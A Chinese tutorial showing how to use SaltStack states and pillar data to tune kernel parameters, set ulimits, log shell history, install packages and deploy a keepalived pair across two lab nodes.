saltstack实践案例

saltstack实践

环境说明：

salt-master:192.168.0.106(node1.xuejl.com)

salt-minion-1:192.168.0.105(node2.xuejl.com)

salt-minion-2:192.168.0.106(node1.xuejl.com)

在环境中存在两个minion客户端，其中node1.xuejl.com同时安装salt-minion和salt-master。

功能说明：

1、        修改/etc/profile用户登录日志的格式

2、        修改/etc/security/limits.conf修改的最大的连接的数量

3、        安装必要的软件

4、        修改/etc/sysctl.conf修改必要的内核参数

5、        安装keepalived

修改配置文件

file_roots:

 base:

    -/srv/salt/base

mkdir –p /srv/salt/base

mkdir /srv/salt/base/{etc,init,src}

其中etc存放的是一系列的配置文件，init存放的是初始化的sls文件，src存放的是安装包等源数据文件

 

cat >/srv/salt/etc/sysctl.conf  <<EOF

# Kernel sysctl configuration file for RedHat Linux

#

# For binary values, 0 is disabled, 1 isenabled.  See sysctl(8) and

# sysctl.conf(5) for more details.

 

# Controls IP packet forwarding

net.ipv4.ip_forward = 0

 

# Controls source route verification

net.ipv4.conf.default.rp_filter = 1

 

# Do not accept source routing

net.ipv4.conf.default.accept_source_route =0

 

# Controls the System Request debuggingfunctionality of the kernel

kernel.sysrq = 0

 

# Controls whether core dumps will appendthe PID to the core filename.

# Useful for debugging multi-threadedapplications.

kernel.core_uses_pid = 1

 

# Controls the use of TCP syncookies

net.ipv4.tcp_syncookies = 1

 

# Disable netfilter on bridges.

net.bridge.bridge-nf-call-ip6tables = 0

net.bridge.bridge-nf-call-iptables = 0

net.bridge.bridge-nf-call-arptables = 0

 

# Controls the default maxmimum size of amesage queue

kernel.msgmnb = 65536

 

# Controls the maximum size of a message,in bytes

kernel.msgmax = 65536

 

# Controls the maximum shared segment size,in bytes

kernel.shmmax = 68719476736

 

# Controls the maximum number of sharedmemory segments, in pages

kernel.shmall = 4294967296

net.ipv4.tcp_syncookies = 1

net.ipv4.tcp_tw_reuse = 1

net.ipv4.tcp_tw_recycle = 1

net.ipv4.tcp_fin_timeout = 30

net.ipv4.ip_forward=1

net.ipv4.ip_local_port_range = 5000     65000

net.ipv4.tcp_max_syn_backlog = 819200

vm.zone_reclaim_mode = 1

net.nf_conntrack_max = 52420

EOF

cat >/srv/salt/base/etc/limits.conf<<EOF

# /etc/security/limits.conf

#

#Each line describes a limit for a user inthe form:

#

#<domain>        <type>  <item> <value>

#

#Where:

#<domain> can be:

#       - an user name

#       - a group name, with @group syntax

#       - the wildcard *, for default entry

#       - the wildcard %, can be also used with %group syntax,

#                 for maxlogin limit

#

#<type> can have the two values:

#       - "soft" for enforcing the soft limits

#       - "hard" for enforcing hard limits

#

#<item> can be one of the following:

#        - core - limits the core file size (KB)

#       - data - max data size (KB)

#       - fsize - maximum filesize (KB)

#       - memlock - max locked-in-memory address space (KB)

#       - nofile - max number of open files

#       - rss - max resident set size (KB)

#       - stack - max stack size (KB)

#       - cpu - max CPU time (MIN)

#       - nproc - max number of processes

#       - as - address space limit (KB)

#       - maxlogins - max number of logins for this user

#       - maxsyslogins - max number of logins on the system

#       - priority - the priority to run user process with

#       - locks - max number of file locks the user can hold

#       - sigpending - max number of pending signals

#       - msgqueue - max memory used by POSIX message queues (bytes)

#       - nice - max nice priority allowed to raise to values: [-20, 19]

#       - rtprio - max realtime priority

#

#<domain>      <type>  <item>         <value>

#

 

#*               soft    core            0

#*               hard    rss             10000

#@student        hard   nproc           20

#@faculty        soft   nproc           20

#@faculty        hard   nproc           50

#ftp             hard    nproc           0

#@student        -      maxlogins       4

*            soft nproc               65535

*            hard      nproc               65535

*            soft nofile         65535

*            hard      nofile         65535

# End of file

EOF

修改用户日志格式

cd /srv/salt/base/init

 

 

cat >log.sls <<EOF

user_log:

 file.append:

    -name: /etc/profile

    -text:

     - export HISTTIMEFORMAT="{\"TIME\":\"%F%T\",\"HOSTNAME\":\"$HOSTNAME\",\"LI\":\"$(who-u am i 2>/dev/null| awk '{print $NF}'|sed -e's/[()]//g')\",\"LU\":\"$(who am i|awk '{print$1}')\",\"NU\":\"${USER}\",\"CMD\":\""

     - export PROMPT_COMMAND='history 1|tail -1|sed "s/^[ ]\+[0-9]\+  //"|sed "s/$/\"}/">>/var/log/command.log'

EOF

安装必要的软件包

cat >package.sls<<EOF

package:

 pkg.installed:

    -pkgs:

     - lrzsz

     - bind

     - lsof

     - telnet

     - gcc

     - gcc-c++

     - httpd

     - openssl-devel

EOF

修改系统内核参数

cat >sysctl.sls <<EOF

/etc/sysctl.conf:

 file.managed:

    -source: salt://etc/sysctl.conf

    -user: root

    -group: root

    -mode: 644

EOF

修改系统的最大连接数

cat >ulimit.sls <<EOF

limit.conf:

 file.managed:

    -source: salt://etc/limits.conf

    -user: root

    -group: root

    -mode: 644

    -name: /etc/security/limits.conf

EOF

安装 keepalived

mkdir -p /srv/salt/base/init/keepalived

cd /srv/salt/base/init/keepalived

1、        安装

首先把下载好的keepalived的压缩包放到 /srv/salt/base/src下面去

cat >install_keepalived.sls <<EOF

install.keepalived:

 file.managed:

    -source: salt://src/keepalived-1.2.20.tar.gz

    -user: root

    -group: root

    -name: /usr/local/src/keepalived-1.2.20.tar.gz

 cmd.run:

    -name: tar -zxvf /usr/local/src/keepalived-1.2.20.tar.gz

    - name: cd /usr/local/src/keepalived-1.2.20&& ./configure --prefix=/usr/local/keepalived --sysconfdir=/etc  && make&& make install

    -name: cp /etc/keepalived/keepalived.conf /srv/salt/base/etc/keepalived.conf

EOF

 

 

cat >/srv/salt/base/etc/keepalived.conf<<EOF

! Configuration File for keepalived

 

global_defs {

  notification_email {

    #sysadmin@firewall.loc

   }

  #notification_email_from Alexandre.Cassen@firewall.loc

  #smtp_server 192.168.200.1

 # smtp_connect_timeout 30

  router_id LVS_DEVEL

}

 

vrrp_script chk_haproxy {

       script "killall -0 haproxy"

       interval 2

       weight -4

}

 

vrrp_instance VI_1 {

   state {{ state1 }}

   interface eth0

   virtual_router_id {{ routerid }}

   priority {{ priority }}

   virtual_ro

   advert_int 1

   authentication {

       auth_type PASS

       auth_pass 1111

    }

   virtual_ipaddress {

       {{ vip }}

    }

   track_script {

       chk_haproxy

    }

}

 

vrrp_instance VI_2 {

   state {{ state2 }}

   interface eth0

   virtual_router_id {{ routerid1 }}

   priority {{ priority1 }}

   virtual_ro

   advert_int 1

   authentication {

       auth_type PASS

       auth_pass 2222

    }

   virtual_ipaddress {

       {{ vip2 }}

    }

   track_script {

       chk_haproxy

    }

}

EOF

设置keepalived的配置文件内容

cat >keepalived_conf_file.sls<<EOF

keepalived_conf_file:

 file.managed:

    -source: salt://etc/keepalived.conf

    -mode: 644

    -user: root

    -group: root

    -template: jinja

    -defaults:

     priority: {{ salt['pillar.get']('keepalived:priority') }}

     priority1: {{ salt['pillar.get']('keepalived:priority1') }}

     vip: {{ salt['pillar.get']('keepalived:vip') }}

     vip2: {{ salt['pillar.get']('keepalived:vip2') }}

     routerid: {{ salt['pillar.get']('keepalived:routerid') }}

     routerid1: {{ salt['pillar.get']('keepalived:routerid1') }}

     state2: {{ salt['pillar.get']('keepalived:state2') }}

     state1: {{ salt['pillar.get']('keepalived:state1') }}

    -name: /etc/keepalived/keepalived.conf

EOF

note:上面的配置文件采用了jiaja模板，此数据到时候会通过pillar来加载

 

设置keepalived的log（如果不进行设置的话，默认的keepalived的log日志会保存到/var/log/message中）

cat >keepalived_log.sls <<EOF
keepalived_log:

 file.replace:

    -pattern: KEEPALIVED_OPTIONS="-D"

    -repl: KEEPALIVED_OPTIONS="-D -d -S 0"

    -name: /etc/sysconfig/keepalived

EOF

设置日志的保存位置

cat >keepalived_rsyslog.sls <<EOF

keepalived_log_config:

 file.append:

    -name: /etc/rsyslog.conf

    -text: "local0.*                                     /var/log/keepalived.log"

 cmd.run:

    -name: /etc/init.d/rsyslog restart

EOF

创建了那么多的state文件如果一个一个执行的话会显得比较乱，所以在此处我们通过一个文件进行加载

cat > /srv/salt/base/init/env_init.sls<<EOF

include:

  -init.hosts

  -init.sysctl

  -init.package

  -init.ulimit

  -init.install_keepalived

  -init.keepalived.keepalived_rsyslog

  -init.keepalived.keepalived_log

  -init.keepalived.keepalived_conf_file

  -init.log

到此文件已经全部进行加载了

之后为keepalived进行pillar的配置

cat /etc/salt/pillar

pillar_roots:

 base:

    -/srv/pillar

mkdir –p /srv/pillar/env_init

cd /srv/pillar/env_init

cat >keepalived.sls <<EOF
keepalived:

  {%if grains['id'] == 'node1.xuejl.com' %}

 state1: BACKUP

 routerid: 51

 priority: 100

 vip: 192.168.0.253

 state2: MASTER

 routerid1: 151

 priority1: 101

 vip2: 192.168.0.254

  {%elif grains['id'] == 'node2.xuejl.com' %}

 state1: MASTER

 routerid: 51

 priority: 101

 vip: 192.168.0.253

 state2: BACKUP

 routerid1: 151

 priority1: 100

 vip2: 192.168.0.254

  {%else %}

 port: 80

  {%endif %}

在此处为keepalived的pillar信息，设置好之后对其进行加载

salt ‘*’ saltutil.refresh_pillar

刷新之后可以查看信定义的pillar信息

salt ‘*’pillar.items

同样pillar 信息通过一个文件进行加载

cat <init.sls <<EOF
include:

  -env_init.keepalived

EOF

在此大概所有的我们所需的state文件已经编写好，此时我们只需要编写top.sls进行加载执行就好了

 

 

cat >/srv/salt/base/top.sls <<EOF

base:

 '*':

    -init.env_init

EOF

好了编写好了 进行执行

salt ‘*’ state.highstate

好了，这样子就执行了。

同样如果我们想实现类似于puppet的那样的结果，每30分钟就同步一次数据信息，可以编写pillar信息就行操作

schedule:

 helloworld:

   function: state.highstate

   args:

     - top

   minutes: 30

这样子就可以了，之后加载然后对pillar进行刷新即可得到结果。